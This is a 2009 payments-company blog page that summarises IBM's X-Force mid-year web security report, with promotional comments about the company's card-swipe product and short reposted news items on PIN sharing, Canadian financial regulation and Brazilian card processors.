Thursday, August 27, 2009

IBM: Unprecedented State of Web Insecurity - No Such Thing as Safe Browsing




IBM's X-Force Trend and Risk Report has "officially" verified what the HomeATM Blog has been messaging for the last 16 months, which is basically that if you are going to conduct a financial transaction, it must be done outside the browser space...because browsers are unsafe.  You may had seen yesterday's post concerning the Top 11 eCommerce Paradigm Shifters which  put HomeATM in Gear.  Combined with today's release of their  X-Force Report, you gotta like HomeATM's approach to securing online transactions as we are the only company who does it "outside" the browser space.  (using our simple 2FA 3DES DUKPT E2EE.  :-)






The IBM
X-Force Trend and Risk Report is produced twice per year: once at
mid-year and once at year-end.  This report provides statistical
information about all aspects of threats that affect web security,
including software vulnerabilities and public exploitation, malware,
spam, phishing, web-based threats, and general cyber criminal activity.


They are intended to help customers, fellow researchers, and the public
at large understand the changing nature of the threat landscape and
what might be done to mitigate it...like swipe vs. type!

The report also reveals what it describes as “an unprecedented state of Web insecurity" as Web client, server, and content threats converge to create an untenable risk landscape.”


IBM’s researchers have clocked a 508% increase in the number of new malicious Web links and a level of veiled Web exploits, especially in PDF files, which is now running at an all time high.

The X-Force report notes an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines and mainstream news sites. PDF vulnerabilities disclosed in the first half of 2009 apparently surpassed disclosures from all of 2008.

“No one is to be trusted,” said X-Force Director Kris Lamb. “There is no such thing as safe browsing. We’ve reached a tipping point where every web site should be viewed as suspicious and every user is at risk.”

Editor's Note:  Sound like a familiar rant? I'm coming from help when I say: "Don't Type...Swipe!"  Want to register to read the report?  Here's the Link (PDF)    Also...here's IBM"s Press Release:







ARMONK, N.Y.













-

26 Aug 2009:


IBM (NYSE: IBM
) today released results from its X-Force 2009 Mid-Year Trend and Risk
Report. The report's findings show an unprecedented state of Web
insecurity as Web client, server, and content threats converge to
create an untenable risk landscape.



According
to the report, there has been a 508 percent increase in the number of
new malicious Web links discovered in the first half of 2009. This
problem is no longer limited to malicious domains or untrusted Web
sites. The X-Force report notes an increase in the presence of
malicious content on trusted sites, including popular search engines,
blogs, bulletin boards, personal Web sites, online magazines and
mainstream news sites. The ability to gain access and manipulate data
remains the primary consequence of vulnerability exploitations.



The X-Force report also reveals that the level of veiled Web
exploits, especially PDF files, are at an all time high, pointing to
increased sophistication of attackers. PDF vulnerabilities disclosed in
the first half of 2009 surpassed disclosures from all of 2008. From Q1
to Q2 alone, the amount of suspicious, obfuscated or concealed content
monitored by the IBM ISS Managed Security Services team nearly doubled.





"The trends highlighted by the report seem to indicate that the
web has finally taken on the characteristics of the Wild West
where no one is to be trusted," said X-Force Director Kris Lamb. "There
is no such thing as safe browsing today
and it is no longer the case
that only the red light district sites are responsible for malware.


We've reached a tipping point where every Web site should be viewed as
suspicious and every user is at risk. The threat convergence of the Web
ecosystem is creating a perfect storm of criminal activity."







Web security is no longer just a browser or client-side issue;
criminals are leveraging insecure Web applications to target the users
of legitimate Web sites. The X-Force report found a significant rise in
Web application attacks with the intent to steal and manipulate data
and take command and control of infected computers. For example, SQL
injection attacks - attacks where criminals inject malicious code into
legitimate Web sites, usually for the purpose of infecting visitors -
rose 50 percent from Q4 2008 to Q1 2009 and then nearly doubled from Q1
to Q2.



"Two of the major themes for the first half of 2009 are the increase
in sites hosting malware and the doubling of obfuscated Web attacks,"
Lamb said. "The trends seem to reveal a fundamental security weakness
in the Web ecosystem where interoperability between browsers, plugins,
content and server applications dramatically increase the complexity
and risk. Criminals are taking advantage of the fact that there is no
such thing as a safe browsing environment and are leveraging insecure
Web applications to target legitimate Web site users."



The 2009 Midyear X-Force report also finds that:

















The X-Force research team has been cataloguing, analyzing and
researching vulnerability disclosures since 1997. With more than 43,000
security vulnerabilities catalogued, it has the largest vulnerability
database in the world. This unique database helps X-Force researchers
to understand the dynamics that make up vulnerability discovery and
disclosure.

IBM is one of the world's leading providers of risk and security
solutions. Clients around the world partner with IBM to help reduce the
complexities of security and strategically manage risk. IBM's
experience and range of risk and security solutions -- from dedicated
research, software, hardware, services and global Business Partner
value -- are unsurpassed, helping clients secure business operations
and implement company-wide, integrated risk management programs.



For more security trends and predictions from IBM, including graphical representations of security statistics, download the 2009 IBM X-Force Mid-Year Trend and Risk Report today.



About IBM

For more information about IBM, visit www.ibm.com...nuff said.



















Reblog this post [with Zemanta]

Survey Says! 8 Million Brits Share PIN Numbers




Eight million Brits share PIN numbers - survey

Finextra: Over eight million Brits have handed over their Chip and PIN details to someone else in the last year, with a quarter of these falling victim to fraud, according to a survey for insurance firm LV=.

An online poll of 3002 people shows 20% have given out their card and PIN number - 85% of these in the past year - to someone else to make a purchase on their behalf or get money from a cash machine.

By far the worst offenders are younger people with over one in three of the under 35s admitting they have asked someone else to use one of their cards. The most common location for 'borrowed' cards to be used is at a cash machine.

Continue Reading at Finextra



Reblog this post [with Zemanta]

Canadian Think Tank: Credit Card Companies Should be Federally Regulated




Canada urged to expand financial regulatory powers | Markets | Markets News | Reuters


"Credit card companies should be federally regulated"



OTTAWA, Aug 26 (Reuters) - Canada's banking regulator should license and approve all financial instruments available to investors in the country, even if they originate in the United States, a new report recommended on Wednesday.



The report by two economists at the Canadian Centre for Policy Alternatives, a left-leaning think tank, also urged the rapid creation of a single securities regulator in Canada to make sure officials can properly monitor markets and detect risky behavior or excesses before they get out of control.



A single financial markets watchdog, replacing the 13 regional regulators now in place, is a key ambition of Finance Minister Jim Flaherty and would bring under federal jurisdiction the "shadow" banking sector. That unregulated sector once accounted for nearly half of all Canadian borrowing and includes non-bank lenders as well as hedge funds and securitized debt vehicles.



Continue Reading at Reuters

















Reblog this post [with Zemanta]

VisaNet, Redecard Shares Fall on Brazil Competition Concern





Aug. 26 (Bloomberg) -- Redecard SA and Cia. Brasileira de Meios de Pagamento, Brazil’s biggest debit- and credit-card payment processing companies, fell the most in at least two weeks after a newspaper reported the companies may face increased competition from state-controlled lenders.

Redecard, the processor of Mastercard Inc. payments, lost 1.7 percent to 26.25 reais in Sao Paulo trading for the biggest decline since Aug. 12. VisaNet, as the processor of Visa Inc. payments is known, slid 3.3 percent, the most since Aug. 6, to 16.81 reais.


Federally controlled banks Banco do Brasil SA and Caixa Economica Federal will “soon” start offering credit cards under their own brand as part of a government effort to increase competition, Brasilia-based Correio Braziliense newspaper reported today without saying where it obtained the information.

“The report adds to concern that these companies will face more competition in the future,” said Mariana Taddeo, an analyst with Link Investimentos in Sao Paulo.


Continue Reading




















Reblog this post [with Zemanta]

Disqus for ePayment News